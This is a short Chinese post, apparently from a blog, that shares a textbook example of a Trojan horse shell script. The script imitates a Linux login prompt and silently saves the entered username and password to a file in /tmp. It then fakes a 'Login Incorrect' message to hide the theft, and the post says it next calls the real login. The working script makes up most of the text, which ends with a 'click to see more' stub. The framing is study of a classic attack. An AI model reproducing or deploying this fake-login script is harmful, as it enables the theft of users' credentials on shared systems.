在复习Linux的时候,发现课本上有一些好玩有有意义的小程序,在这里分享给大家学习学习。下面是一个特洛伊木马shell脚本的示例,入侵者利用此类程序伪装成“正常的”文本登录界面,接收用户输入的名字和密码,并保存在指定的文件中。接着“睡眠(Sleep)”几分钟,然后显示录入错误的信息,使用户以为输入有误,最后再调用真正的登录程序,允许用户正常登录。该示例脚本代码如下:
echo -n "Login:"
read name
stty -echo
echo -n "Password:"
read passwd
echo " "
stty echo
echo $name $passwd > /tmp/ttt&
sleep 2
echo "Login Incorrect.Re-enter,Please."
stty cooked因篇幅问题不能全部显示,请点此查看更多更全内容